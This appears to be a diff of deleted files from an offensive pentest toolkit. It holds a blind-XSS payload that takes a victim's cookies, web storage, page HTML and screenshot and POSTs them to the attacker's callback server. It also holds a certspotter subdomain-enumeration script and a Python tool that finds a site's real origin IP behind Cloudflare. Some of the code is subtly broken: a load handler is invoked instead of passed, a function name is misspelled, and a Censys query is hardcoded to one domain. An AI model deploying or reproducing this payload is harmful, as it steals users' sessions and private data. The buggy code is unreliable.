s=e.left,a=e.top,c=e.width,h=e.height-r[2].width;switch(o){case 0:h=r[0].width,t.args=F({c1:[s,a],c2:[s+c,a],c3:[s+c-r[1].width,a+h],c4:[s+r[3].width,a+h]},n[0],n[1],i.topLeftOuter,i.topLeftInner,i.topRightOuter,i.topRightInner);break;case 1:s=e.left+e.width-r[1].width,c=r[1].width,t.args=F({c1:[s+c,a],c2:[s+c,a+h+r[2].width],c3:[s,a+h],c4:[s,a+r[0].width]},n[1],n[2],i.topRightOuter,i.topRightInner,i.bottomRightOuter,i.bottomRightInner);break;case 2:a=a+e.height-r[2].width,h=r[2].width,t.args=F({c1:[s+c,a+h],c2:[s,a+h],c3:[s+r[3].width,a],c4:[s+c-r[3].width,a]},n[2],n[3],i.bottomRightOuter,i.bottomRightInner,i.bottomLeftOuter,i.bottomLeftInner);break;case 3:c=r[3].width,t.args=F({c1:[s,a+h+r[2].width],c2:[s,a],c3:[s+c,a+r[0].width],c4:[s+c,a+h]},n[3],n[0],i.bottomLeftOuter,i.bottomLeftInner,i.topLeftOuter,i.topLeftInner)}}return t})}},P.prototype.parseBackgroundClip=function(t,e,n,r,i){var o=t.css("backgroundClip"),s=[];switch(o){case"content-box":case"padding-box":W(s,r[0],r[1],e.topLeftInner,e.topRightInner,i.left+n[3].width,i.top+n[0].width),W(s,r[1],r[2],e.topRightInner,e.bottomRightInner,i.left+i.width-n[1].width,i.top+n[0].width),W(s,r[2],r[3],e.bottomRightInner,e.bottomLeftInner,i.left+i.width-n[1].width,i.top+i.height-n[2].width),W(s,r[3],r[0],e.bottomLeftInner,e.topLeftInner,i.left+n[3].width,i.top+i.height-n[2].width);break;default:W(s,r[0],r[1],e.topLeftOuter,e.topRightOuter,i.left,i.top),W(s,r[1],r[2],e.topRightOuter,e.bottomRightOuter,i.left+i.width,i.top),W(s,r[2],r[3],e.bottomRightOuter,e.bottomLeftOuter,i.left+i.width,i.top+i.height),W(s,r[3],r[0],e.bottomLeftOuter,e.topLeftOuter,i.left,i.top+i.height)}return s},P.prototype.pseudoHideClass="___html2canvas___pseudoelement";var Te=0;pe.prototype.renderImage=function(t,e,n,r){var i=t.cssInt("paddingLeft"),o=t.cssInt("paddingTop"),s=t.cssInt("paddingRight"),a=t.cssInt("paddingBottom"),c=n.borders,h=e.width-(c[1].width+c[3].width+i+s),u=e.height-(c[0].width+c[2].width+o+a);this.drawImage(r,0,0,r.image.width||h,r.image.height||u,e.left+i+c[3].width,e.top+o+c[0].width,h,u)},pe.prototype.renderBackground=function(t,e,n){e.height>0&&e.width>0&&(this.renderBackgroundColor(t,e),this.renderBackgroundImage(t,e,n))},pe.prototype.renderBackgroundColor=function(t,e){var n=t.css("backgroundColor");this.isTransparent(n)||this.rectangle(e.left,e.top,e.width,e.height,t.css("backgroundColor"))},pe.prototype.renderBorders=function(t){t.forEach(this.renderBorder,this)},pe.prototype.renderBorder=function(t){this.isTransparent(t.color)||null===t.args||this.drawShape(t.args,t.color)},pe.prototype.renderBackgroundImage=function(t,e,n){var r=t.parseBackgroundImages();r.reverse().forEach(function(r,i,o){switch(r.method){case"url":var s=this.images.get(r.args[0]);s?this.renderBackgroundRepeating(t,e,s,o.length-(i+1),n):E("Error loading background-image",r.args[0]);break;case"linear-gradient":case"gradient":var a=this.images.get(r.value);a?this.renderBackgroundGradient(a,e,n):E("Error loading background-image",r.args[0]);break;case"none":break;default:E("Unknown background-image type",r.args[0])}},this)},pe.prototype.renderBackgroundRepeating=function(t,e,n,r,i){var o=t.parseBackgroundSize(e,n.image,r),s=t.parseBackgroundPosition(e,n.image,r,o),a=t.parseBackgroundRepeat(r);switch(a){case"repeat-x":case"repeat no-repeat":this.backgroundRepeatShape(n,s,o,e,e.left+i[3],e.top+s.top+i[0],99999,n.image.height,i);break;case"repeat-y":case"no-repeat repeat":this.backgroundRepeatShape(n,s,o,e,e.left+s.left+i[3],e.top+i[0],n.image.width,99999,i);break;case"no-repeat":this.backgroundRepeatShape(n,s,o,e,e.left+s.left+i[3],e.top+s.top+i[0],n.image.width,n.image.height,i);break;default:this.renderBackgroundRepeat(n,s,o,{top:e.top,left:e.left},i[3],i[0])}},pe.prototype.isTransparent=function(t){return!t||"transparent"===t||"rgba(0, 0, 0, 0)"===t},le.prototype=Object.create(T.prototype),le.prototype.getParentStack=function(t){var e=this.parent?this.parent.stack:null;return e?e.ownStacking?e:e.getParentStack(t):t.stack},de.prototype.testRangeBounds=function(t){var e,n,r,i,o=!1;return t.createRange&&(e=t.createRange(),e.getBoundingClientRect&&(n=t.createElement("boundtest"),n.style.height="123px",n.style.display="block",t.body.appendChild(n),e.selectNode(n),r=e.getBoundingClientRect(),i=r.height,123===i&&(o=!0),t.body.removeChild(n))),o},de.prototype.testCORS=function(){return"undefined"!=typeof(new Image).crossOrigin},de.prototype.testSVG=function(){var t=new Image,n=e.createElement("canvas"),r=n.getContext("2d");t.src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'></svg>";try{r.drawImage(t,0,0),n.toDataURL()}catch(i){return!1}return!0},fe.prototype.hasFabric=function(){return html2canvas.fabric?Promise.resolve():Promise.reject(new Error("html2canvas.svg.js is not loaded, cannot render svg"))},fe.prototype.inlineFormatting=function(t){return/^data:image\/svg\+xml;base64,/.test(t)?this.decode64(this.removeContentType(t)):this.removeContentType(t)},fe.prototype.removeContentType=function(t){return t.replace(/^data:image\/svg\+xml(;base64)?,/,"")},fe.prototype.isInline=function(t){return/^data:image\/svg\+xml/i.test(t)},fe.prototype.createCanvas=function(t){var e=this;return function(n,r){var i=new html2canvas.fabric.StaticCanvas("c");e.image=i.lowerCanvasEl,i.setWidth(r.width).setHeight(r.height).add(html2canvas.fabric.util.groupSVGElements(n,r)).renderAll(),t(i.lowerCanvasEl)}},fe.prototype.decode64=function(e){return"function"==typeof t.atob?t.atob(e):ge(e)},me.prototype=Object.create(fe.prototype),ye.prototype=Object.create(T.prototype),ye.prototype.applyTextTransform=function(){this.node.data=this.transform(this.parent.css("textTransform"))},ye.prototype.transform=function(t){var e=this.node.data;switch(t){case"lowercase":return e.toLowerCase();case"capitalize":return e.replace(/(^|\s|:|-|\(|\))([a-z])/g,ve);case"uppercase":return e.toUpperCase();default:return e}},we.prototype=Object.create(f.prototype),xe.prototype=Object.create(pe.prototype),xe.prototype.setFillStyle=function(t){return this.ctx.fillStyle=t,this.ctx},xe.prototype.rectangle=function(t,e,n,r,i){this.setFillStyle(i).fillRect(t,e,n,r)},xe.prototype.drawShape=function(t,e){this.shape(t),this.setFillStyle(e).fill()},xe.prototype.taints=function(t){if(null===t.tainted){this.taintCtx.drawImage(t.image,0,0);try{this.taintCtx.getImageData(0,0,1,1),t.tainted=!1}catch(n){this.taintCtx=e.createElement("canvas").getContext("2d"),t.tainted=!0}}return t.tainted},xe.prototype.drawImage=function(t,e,n,r,i,o,s,a,c){(!this.taints(t)||this.options.allowTaint)&&this.ctx.drawImage(t.image,e,n,r,i,o,s,a,c)},xe.prototype.clip=function(t,e,n){this.ctx.save(),this.shape(t).clip(),e.call(n),this.ctx.restore()},xe.prototype.shape=function(t){return this.ctx.beginPath(),t.forEach(function(t,e){this.ctx[0===e?"moveTo":t[0]+"To"].apply(this.ctx,t.slice(1))},this),this.ctx.closePath(),this.ctx},xe.prototype.font=function(t,e,n,r,i,o){this.setFillStyle(t).font=[e,n,r,i,o].join(" ")},xe.prototype.fontShadow=function(t,e,n,r){this.setVariable("shadowColor",t).setVariable("shadowOffsetY",e).setVariable("shadowOffsetX",n).setVariable("shadowBlur",r)},xe.prototype.clearShadow=function(){this.setVariable("shadowColor","rgba(0,0,0,0)")},xe.prototype.setOpacity=function(t){this.ctx.globalAlpha=t},xe.prototype.setTransform=function(t){this.ctx.translate(t.origin[0],t.origin[1]),this.ctx.transform.apply(this.ctx,t.matrix),this.ctx.translate(-t.origin[0],-t.origin[1])},xe.prototype.setVariable=function(t,e){return this.variables[t]!==e&&(this.variables[t]=this.ctx[t]=e),this},xe.prototype.text=function(t,e,n){this.ctx.fillText(t,e,n)},xe.prototype.backgroundRepeatShape=function(t,e,n,r,i,o,s,a,c){var h=[["line",Math.round(i),Math.round(o)],["line",Math.round(i+s),Math.round(o)],["line",Math.round(i+s),Math.round(a+o)],["line",Math.round(i),Math.round(a+o)]];this.clip(h,function(){this.renderBackgroundRepeat(t,e,n,r,c[3],c[0])},this)},xe.prototype.renderBackgroundRepeat=function(t,e,n,r,i,o){var s=Math.round(r.left+e.left+i),a=Math.round(r.top+e.top+o);this.setFillStyle(this.ctx.createPattern(this.resizeImage(t,n),"repeat")),this.ctx.translate(s,a),this.ctx.fill(),this.ctx.translate(-s,-a)},xe.prototype.renderBackgroundGradient=function(t,e){if(t instanceof x){var n=this.ctx.createLinearGradient(e.left+e.width*t.x0,e.top+e.height*t.y0,e.left+e.width*t.x1,e.top+e.height*t.y1);t.colorStops.forEach(function(t){n.addColorStop(t.stop,t.color)}),this.rectangle(e.left,e.top,e.width,e.height,n)}},xe.prototype.resizeImage=function(t,n){var r=t.image;if(r.width===n.width&&r.height===n.height)return r;var i,o=e.createElement("canvas");return o.width=n.width,o.height=n.height,i=o.getContext("2d"),i.drawImage(r,0,0,r.width,r.height,0,0,n.width,n.height),o}}(window,document);
    190  - 
    191  -function collectDatas()
    192  -{
    193  - window.setTimeout( doCollectDatas, 2000 );
    194  -}
    195  - 
    196  -function doCollectDatas()
    197  -{
    198  - var callback = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';
    199  - 
    200  - var t_datas = new Object();
    201  - t_datas['origin'] = document.location.origin;
    202  - t_datas['user_agent'] = navigator.userAgent;
    203  - t_datas['target_url'] = document.URL;
    204  - t_datas['referrer_url'] = document.referrer;
    205  - t_datas['cookies'] = document.cookie;
    206  - t_datas['session_storage'] = JSON.stringify(sessionStorage);
    207  - t_datas['local_storage'] = JSON.stringify(localStorage);
    208  - t_datas['document_html'] = document.documentElement.outerHTML;
    209  - 
    210  - try {
    211  - html2canvas(document.body).then(function(canvas) {
    212  - t_datas['screenshot'] = canvas.toDataURL();
    213  - sendDatas( callback, t_datas );
    214  - }, function() {
    215  - t_datas['screenshot'] = '';
    216  - sendDatas( callback, t_datas );
    217  - });
    218  - } catch( e ) {
    219  - t_datas['screenshot'] = '';
    220  - sendDatas( callback, t_datas );
    221  - }
    222  -}
    223  - 
    224  -function sendDatas( callback, t_datas )
    225  -{
    226  - var xhr = new XMLHttpRequest();
    227  - xhr.open( 'POST', callback, true );
    228  - xhr.setRequestHeader( 'Content-type', 'application/x-www-form-urlencoded' );
    229  - xhr.send( 'datas=' + JSON.stringify(t_datas) );
    230  -}
    231  - 
    232  -if( document.readyState == 'complete' ) {
    233  - collectDatas();
    234  -} else {
    235  - if( window.addEventListener ) {
    236  - window.addEventListener( 'load', collectDatas(), false );
    237  - } else if( window.attachEvent ) {
    238  - window.attachEvent( 'onload', collecDatas() );
    239  - }
    240  -}
    241  - 
  • ■ ■ ■ ■ ■ ■
    certspotter.sh
    1  -#!/bin/bash
    2  - 
    3  -curl -s https://certspotter.com/api/v0/certs?domain=$1 | jq -c '.[].dns_names' | grep -o '"[^"]\+"' | tr -d '"' | sort -fu;
    4  - 
  • ■ ■ ■ ■ ■ ■
    cloudflare-origin-ip.py
    1  -#!/usr/bin/python2
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import os
    7  -import sys
    8  -import json
    9  -import requests
    10  -import tldextract
    11  -import socket
    12  -import argparse
    13  -import threading
    14  -import time
    15  -import textwrap
    16  -from functools import partial
    17  -# from urlparse import urlparse
    18  -from urllib import parse
    19  -from termcolor import colored
    20  -from netaddr import *
    21  -from multiprocessing.dummy import Pool
    22  - 
    23  -# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
    24  -from requests.packages.urllib3.exceptions import InsecureRequestWarning
    25  -requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    26  - 
    27  - 
    28  -def banner():
    29  - print("""
    30  - _ _ __ _ _ _ _
    31  - ___| | ___ _ _ __| |/ _| | __ _ _ __ ___ ___ _ __(_) __ _(_)_ __ (_)_ __ _ __ _ _
    32  - / __| |/ _ \| | | |/ _` | |_| |/ _` | '__/ _ \ / _ \| '__| |/ _` | | '_ \ | | '_ \ | '_ \| | | |
    33  - | (__| | (_) | |_| | (_| | _| | (_| | | | __/ | (_) | | | | (_| | | | | | | | |_) | _ | |_) | |_| |
    34  - \___|_|\___/ \__,_|\__,_|_| |_|\__,_|_| \___| \___/|_| |_|\__, |_|_| |_| |_| .__/ (_) | .__/ \__, |
    35  - |___/ |_| |_| |___/
    36  - 
    37  - by @gwendallecoguic
    38  - 
    39  -""")
    40  - pass
    41  - 
    42  -banner()
    43  - 
    44  - 
    45  -TEST_BYPASS = 1
    46  -GOOD_CANDIDATE_SCORE = 80
    47  -COMPARE_FIRST_CHARS = 1000
    48  -REQUEST_TIMEOUT = 3
    49  -MAX_THREADS = 10
    50  - 
    51  -r_cloudflare = [
    52  - '103.21.244.0/22',
    53  - '103.22.200.0/22',
    54  - '103.31.4.0/22',
    55  - '104.16.0.0/12',
    56  - '108.162.192.0/18',
    57  - '131.0.72.0/22',
    58  - '141.101.64.0/18',
    59  - '162.158.0.0/15',
    60  - '172.64.0.0/13',
    61  - '173.245.48.0/20',
    62  - '188.114.96.0/20',
    63  - '190.93.240.0/20',
    64  - '197.234.240.0/22',
    65  - '198.41.128.0/17'
    66  -]
    67  -r_cloudflare2 = [
    68  - [1729491968,1729492991],
    69  - [1729546240,1729547263],
    70  - [1730085888,1730086911],
    71  - [1745879040,1746927615],
    72  - [1822605312,1822621695],
    73  - [2197833728,2197834751],
    74  - [2372222976,2372239359],
    75  - [2728263680,2728394751],
    76  - [2889875456,2890399743],
    77  - [2918526976,2918531071],
    78  - [3161612288,3161616383],
    79  - [3193827328,3193831423],
    80  - [3320508416,3320509439],
    81  - [3324608512,3324641279]
    82  -]
    83  - 
    84  -t_exclude_headers = [
    85  - 'Set-Cookie', 'Date', 'Last-Modified', 'Expires', 'Age', 'CF-RAY'
    86  -]
    87  - 
    88  -parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent('''Examples:
    89  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx
    90  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx -s censys,crtsh (default)
    91  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx -s /home/local/ips.txt
    92  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx -s censys,crtsh,/home/local/ips.txt,/home/local/subdomains.txt
    93  - 
    94  -Note that this is an automated tool, manual check is still required.
    95  -''') )
    96  -parser.add_argument( "-u","--url",help="url to test" )
    97  -parser.add_argument( "-s","--source",help="datas sources separated by coma, can be: censys,crtsh,local file" )
    98  -parser.parse_args()
    99  -args = parser.parse_args()
    100  - 
    101  -if args.url:
    102  - url = args.url
    103  -else:
    104  - parser.error( 'host is missing <www.example.com>' )
    105  - 
    106  -if args.source:
    107  - t_sources = args.source.split( ',' )
    108  -else:
    109  - t_sources = [ 'censys', 'crtsh' ]
    110  - 
    111  -if 'censys' in t_sources:
    112  - CENSYS_API_URL = 'https://search.censys.io/api'
    113  - try:
    114  - CENSYS_UID = os.environ['CENSYS_UID']
    115  - CENSYS_SECRET = os.environ['CENSYS_SECRET']
    116  - except Exception as e:
    117  - print( "Error: %s not defined" % e )
    118  - print( "To fix this:" )
    119  - print( "export CENSYS_UID=xxxxxxxxxxxxxxxxxxxxxxxxxx" )
    120  - print( "export CENSYS_SECRET=xxxxxxxxxxxxxxxxxxxxxxx" )
    121  - exit()
    122  - 
    123  -# https://stackoverflow.com/questions/5619685/conversion-from-ip-string-to-integer-and-backward-in-python
    124  -def IP2Int(ip):
    125  - o = list( map(int, ip.split('.')) )
    126  - res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]
    127  - return res
    128  - 
    129  -def Int2IP(ipnum):
    130  - o1 = int(ipnum / 16777216) % 256
    131  - o2 = int(ipnum / 65536) % 256
    132  - o3 = int(ipnum / 256) % 256
    133  - o4 = int(ipnum) % 256
    134  - return '%(o1)s.%(o2)s.%(o3)s.%(o4)s' % locals()
    135  - 
    136  - 
    137  -# https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance#Python
    138  -def levenshtein(s, t):
    139  - ''' From Wikipedia article; Iterative with two matrix rows. '''
    140  - if s == t: return 0
    141  - elif len(s) == 0: return len(t)
    142  - elif len(t) == 0: return len(s)
    143  - v0 = [None] * (len(t) + 1)
    144  - v1 = [None] * (len(t) + 1)
    145  - for i in range(len(v0)):
    146  - v0[i] = i
    147  - for i in range(len(s)):
    148  - v1[0] = i + 1
    149  - for j in range(len(t)):
    150  - cost = 0 if s[i] == t[j] else 1
    151  - v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
    152  - for j in range(len(v0)):
    153  - v0[j] = v1[j]
    154  - 
    155  - return v1[len(t)]
    156  - 
    157  - 
    158  -def grabSubs( domain ):
    159  - print( "[+] Grabbing subdomains from crt.sh: %s" % domain )
    160  - url = 'https://crt.sh/?q=%25.' + domain + '&output=json'
    161  - try:
    162  - ex = 0
    163  - r = requests.get( url )
    164  - except Exception as e:
    165  - ex = 1
    166  - print( colored("[-] error occured: %s" % e, 'red') )
    167  - if ex == 0 and r.status_code == 200:
    168  - n = 0
    169  - j = r.json()
    170  - for item in j:
    171  - parse = tldextract.extract( item['name_value'] )
    172  - sub = item['name_value'].replace( '*.', '' )
    173  - if sub != domain and not sub in t_subs:
    174  - t_subs.append( sub )
    175  - try:
    176  - ex = 0
    177  - data = socket.gethostbyname( sub )
    178  - if not data in t_ips:
    179  - n = n + 1
    180  - t_ips.append( data )
    181  - except Exception as e:
    182  - ex = 1
    183  - print( colored("[+] %d subdomains found, %d ips added" % (len(t_subs),n), 'green') )
    184  - 
    185  - 
    186  -def grabIPfromCensys( domain ):
    187  - print( "[+] Grabbing ips from Censys: %s" % domain )
    188  - query = {"query":domain}
    189  - headers = {"Content-Type":"application/json"}
    190  - try:
    191  - ex = 0
    192  - r = requests.get( CENSYS_API_URL+'/v2/hosts/search?q=deciplus.pro', headers=headers, auth=(CENSYS_UID,CENSYS_SECRET) )
    193  - except Exception as e:
    194  - ex = 1
    195  - print( colored("[-] error occurred: %s" % e, 'red') )
    196  - if ex == 0 and r.status_code == 200:
    197  - j = r.json()
    198  - print( colored("[+] %d ips added" % len(j['result']), 'green') )
    199  - if int(j['code']) == 200 and j['status'] == 'OK' and type(j['result']) is dict and len(j['result'])>0 and type(j['result']['hits']) is list and len(j['result']['hits'])>0:
    200  - for i in j['result']['hits']:
    201  - t_ips.append( i['ip'] )
    202  - 
    203  -def readIPfromFile( domain, ipsrc ):
    204  - print( "[+] Reading datas from file: %s" % ipsrc )
    205  - n = 0
    206  - s = 0
    207  - f = open( ipsrc, 'r' )
    208  - for ip in f:
    209  - if domain in ip:
    210  - try:
    211  - ex = 0
    212  - s = s + 1
    213  - ip = socket.gethostbyname( ip.strip() )
    214  - except Exception as e:
    215  - ex = 1
    216  - ip = ''
    217  - 
    218  - ip = ip.strip()
    219  - if ip != '' and not ip in t_ips:
    220  - n = n + 1
    221  - t_ips.append( ip )
    222  - print( colored("[+] %d subdomains found, %d ips added" % (s,n), 'green') )
    223  - 
    224  - 
    225  -# def is_cloudflare( ip ):
    226  -# for r in r_cloudflare:
    227  -# ipn = IPNetwork( r )
    228  -# if ip in list(ipn):
    229  -# return 1
    230  -# return 0
    231  - 
    232  -def is_cloudflare2( ip ):
    233  - ip = IP2Int( str(ip) )
    234  - for r in r_cloudflare2:
    235  - if ip >= r[0] and ip <= r[1]:
    236  - return 1
    237  - return 0
    238  - 
    239  - 
    240  -# def testBypass( r_reference, ip, host ):
    241  -# u = 'https://' + ip
    242  -# headers = {"Host":host}
    243  -# try:
    244  -# ex = 0
    245  -# r = requests.get( u, headers=headers, timeout=REQUEST_TIMEOUT, verify=False )
    246  -# except Exception as e:
    247  -# ex = 1
    248  -# print( colored("[-] %s: %s" % (ip,e), 'red') )
    249  -# if ex == 0:
    250  -# if not 'Content-Type' in r.headers:
    251  -# r.headers['Content-Type'] = ''
    252  -# score = responseCompare( r_reference, r )
    253  -# if score['average'] > GOOD_CANDIDATE_SCORE:
    254  -# sys.stdout.write( colored("%s" % ip, 'green') )
    255  -# sys.stdout.write( " is a GOOD candidate with an average similarity of %d%%\n" % score['average'] )
    256  -# else:
    257  -# sys.stdout.write( "%s" % ip )
    258  -# sys.stdout.write( " is not a good candidate with an average similarity of %d%%\n" % score['average'] )
    259  -# print( colored("Status=%d (%d%%), Length=%d (%d%%), Headers=%d (%d%%), Content-Type=%s (%d%%)" % (r.status_code,score['dist_status_code'],len(r.content),score['dist_content'],len(r.headers),score['dist_headers'],r.headers['Content-Type'],score['dist_content_type']), 'white') )
    260  - 
    261  - 
    262  -# def testBypass2( t_multiproc, r_reference, host, ip ):
    263  -# sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    264  -# t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    265  - 
    266  -# u = 'https://' + ip
    267  -# headers = {"Host":host}
    268  -# headers.update( t_headers )
    269  - 
    270  -# try:
    271  -# r = requests.get( u, headers=headers, timeout=REQUEST_TIMEOUT, verify=False )
    272  -# except Exception as e:
    273  -# print( colored("[-] %s: %s" % (ip,e), 'red') )
    274  -# return
    275  - 
    276  -# if not 'Content-Type' in r.headers:
    277  -# r.headers['Content-Type'] = ''
    278  - 
    279  -# score = responseCompare( r_reference, r )
    280  - 
    281  -# if score['average'] > GOOD_CANDIDATE_SCORE:
    282  -# if is_cloudflare2( IPAddress(ip) ):
    283  -# sys.stdout.write( colored("%s" % ip, 'yellow') )
    284  -# sys.stdout.write( " is CloudFlare\n" )
    285  -# else:
    286  -# sys.stdout.write( colored("%s" % ip, 'green') )
    287  -# sys.stdout.write( " is a GOOD candidate with an average similarity of %d%%\n" % score['average'] )
    288  -# else:
    289  -# sys.stdout.write( "%s" % ip )
    290  -# sys.stdout.write( " is not a good candidate with an average similarity of %d%%\n" % score['average'] )
    291  - 
    292  -# print( colored("Status=%d (%d%%), Length=%d (%d%%), Headers=%d (%d%%), Content-Type=%s (%d%%)" % (r.status_code,score['dist_status_code'],len(r.content),score['dist_content'],len(r.headers),score['dist_headers'],r.headers['Content-Type'],score['dist_content_type']), 'white') )
    293  - 
    294  - 
    295  -def testBypass3( t_multiproc, r_reference, host, ip ):
    296  - sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    297  - t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    298  - 
    299  - if is_cloudflare2( IPAddress(ip) ):
    300  - sys.stdout.write( colored("%s" % ip, 'yellow') )
    301  - sys.stdout.write( " is CloudFlare\n" )
    302  - return
    303  - 
    304  - u = 'https://' + ip
    305  - headers = {"Host":host}
    306  - headers.update( t_headers )
    307  - 
    308  - try:
    309  - r = requests.get( u, headers=headers, timeout=REQUEST_TIMEOUT, verify=False )
    310  - except Exception as e:
    311  - print( colored("[-] %s: %s" % (ip,e), 'red') )
    312  - return
    313  - 
    314  - if not 'Content-Type' in r.headers:
    315  - r.headers['Content-Type'] = ''
    316  - 
    317  - score = responseCompare( r_reference, r )
    318  - 
    319  - if score['average'] > GOOD_CANDIDATE_SCORE:
    320  - sys.stdout.write( colored("%s" % ip, 'green') )
    321  - sys.stdout.write( " is a GOOD candidate with an average similarity of %d%%\n" % score['average'] )
    322  - else:
    323  - sys.stdout.write( "%s" % ip )
    324  - sys.stdout.write( " is not a good candidate with an average similarity of %d%%\n" % score['average'] )
    325  - 
    326  - print( colored("Status=%d (%d%%), Length=%d (%d%%), Headers=%d (%d%%), Content-Type=%s (%d%%)" % (r.status_code,score['dist_status_code'],len(r.content),score['dist_content'],len(r.headers),score['dist_headers'],r.headers['Content-Type'],score['dist_content_type']), 'white') )
    327  - 
    328  - 
    329  -def responseCompare( r_reference, r ):
    330  - score = {
    331  - 'dist_status_code': 0,
    332  - 'dist_content_type': 0,
    333  - 'dist_content': 0,
    334  - 'dist_headers': 0,
    335  - 'average': 0
    336  - }
    337  - 
    338  - if r.status_code == r_reference.status_code:
    339  - score['status_code'] = 'OK'
    340  - score['dist_status_code'] = 100
    341  - else:
    342  - score['status_code'] = 'NOK'
    343  - score['dist_status_code'] = 0
    344  - 
    345  - dist = levenshtein( r.headers['Content-Type'], r_reference.headers['Content-Type'] )
    346  - score['dist_content_type'] = 100 - ( dist*100 / len(r_reference.headers['Content-Type']) )
    347  - 
    348  - dist = levenshtein( r.content[0:COMPARE_FIRST_CHARS], r_reference.content[0:COMPARE_FIRST_CHARS] )
    349  - score['dist_content'] = 100 - ( dist*100 / len(r_reference.content[0:COMPARE_FIRST_CHARS]) )
    350  - # score['content_dist'] = dist
    351  - 
    352  - s_headers = ''
    353  - s_reference_headers = ''
    354  - t_sorted_keys = sorted( r_reference.headers )
    355  - 
    356  - for k in t_sorted_keys:
    357  - if not k in t_exclude_headers:
    358  - s_reference_headers = s_reference_headers + k + '=' + r_reference.headers[k] + ';;'
    359  - if k in r.headers:
    360  - s_headers = s_headers + k + '=' + r.headers[k] + ';;'
    361  - else:
    362  - s_headers = s_headers + k + '=;;'
    363  - 
    364  - # print( s_reference_headers )
    365  - # print( s_headers )
    366  - dist = levenshtein( s_headers, s_reference_headers )
    367  - score['dist_headers'] = 100 - ( dist*100 / len(s_reference_headers) )
    368  - 
    369  - score['average'] = score['dist_status_code'] + score['dist_content_type'] + score['dist_content'] + score['dist_headers']
    370  - score['average'] = score['average'] / 4;
    371  - 
    372  - return score
    373  - 
    374  - 
    375  -if not url.startswith( 'http' ):
    376  - url = 'https://'+url
    377  -t_url_parse = parse.urlparse( url )
    378  -# t_url_parse = urlparse( url )
    379  -t_host_parse = tldextract.extract( t_url_parse.netloc )
    380  -domain = host = t_host_parse.domain + '.' + t_host_parse.suffix
    381  -if len(t_host_parse.subdomain):
    382  - host = t_host_parse.subdomain + '.' + host
    383  -# print( t_url_parse )
    384  -# print( t_host_parse )
    385  - 
    386  -t_ips = []
    387  -t_subs = []
    388  - 
    389  -for s in t_sources:
    390  - if s != 'crtsh' and s!= 'censys':
    391  - if not os.path.isfile( s ):
    392  - print( colored("[-] source file not found: %s" % s, 'red') )
    393  - else:
    394  - readIPfromFile( domain, s )
    395  - 
    396  -if 'crtsh' in t_sources:
    397  - grabSubs( domain )
    398  - 
    399  -if 'censys' in t_sources:
    400  - grabIPfromCensys( domain )
    401  - 
    402  -t_ips = set( t_ips )
    403  -t_ips_cloudflare = []
    404  -t_ips_notcloudflare = []
    405  -t_headers = {
    406  - 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0',
    407  -}
    408  - 
    409  -print( "[+] %d unique ips collected" % len(t_ips) )
    410  - 
    411  -if len(t_ips) == 0:
    412  - exit()
    413  - 
    414  -print( "[+] Performing reference request..." )
    415  -try:
    416  - r_reference = requests.get( url, timeout=3, verify=False, headers=t_headers )
    417  - if not 'Content-Type' in r_reference.headers:
    418  - r_reference.headers['Content-Type'] = ''
    419  -except Exception as e:
    420  - print( colored("[-] error occured: %s" % e, 'red') )
    421  - exit()
    422  - 
    423  -print( colored("Status=%d, Length=%d, Headers=%d, Content-Type=%s" % (r_reference.status_code,len(r_reference.content),len(r_reference.headers),r_reference.headers['Content-Type']), 'cyan') )
    424  -print( "[+] Testing bypass..." )
    425  - 
    426  - 
    427  - 
    428  -###################################### VERSION 3 ######################################
    429  - 
    430  -t_multiproc = {
    431  - 'n_current': 0,
    432  - 'n_total': len(t_ips)
    433  -}
    434  - 
    435  -pool = Pool( MAX_THREADS )
    436  -pool.map( partial(testBypass3,t_multiproc,r_reference,host), t_ips )
    437  -pool.close()
    438  -pool.join()
    439  - 
    440  -exit()
    441  - 
    442  - 
    443  -###################################### VERSION 2 ######################################
    444  - 
    445  -for ip in set(t_ips):
    446  - if is_cloudflare2( IPAddress(ip) ):
    447  - t_ips_cloudflare.append( ip )
    448  - print( colored("%s" % ip, 'red') )
    449  - else:
    450  - t_ips_notcloudflare.append( ip )
    451  - testBypass( r_reference, ip, host )
    452  - 
    453  -exit()
    454  - 
    455  - 
    456  -###################################### SLOW OLD VERSION ######################################
    457  - 
    458  -print( "[+] Checking Cloudflare... (cpu killer)" )
    459  - 
    460  -for ip in set(t_ips):
    461  - if is_cloudflare2( IPAddress(ip) ):
    462  - t_ips_cloudflare.append( ip )
    463  - print( colored("%s" % ip, 'white') )
    464  - else:
    465  - t_ips_notcloudflare.append( ip )
    466  - print( "%s" % ip )
    467  - 
    468  -print( colored("[*] %d Cloudflare ips detected" % len(t_ips_cloudflare), 'white') )
    469  -# for ip in t_ips_cloudflare:
    470  -# print( colored(ip,'white') )
    471  -print( colored("[+] %d ips not Cloudflare" % len(t_ips_notcloudflare), 'green') )
    472  -# for ip in t_ips_notcloudflare:
    473  -# print( ip )
    474  - 
    475  -if TEST_BYPASS:
    476  - print( "[+] Performing reference request..." )
    477  - try:
    478  - r_reference = requests.get( url, timeout=3, verify=False )
    479  - if not 'Content-Type' in r_reference.headers:
    480  - r_reference.headers['Content-Type'] = ''
    481  - except Exception as e:
    482  - print( colored("[-] error occured: %s" % e, 'red') )
    483  - exit()
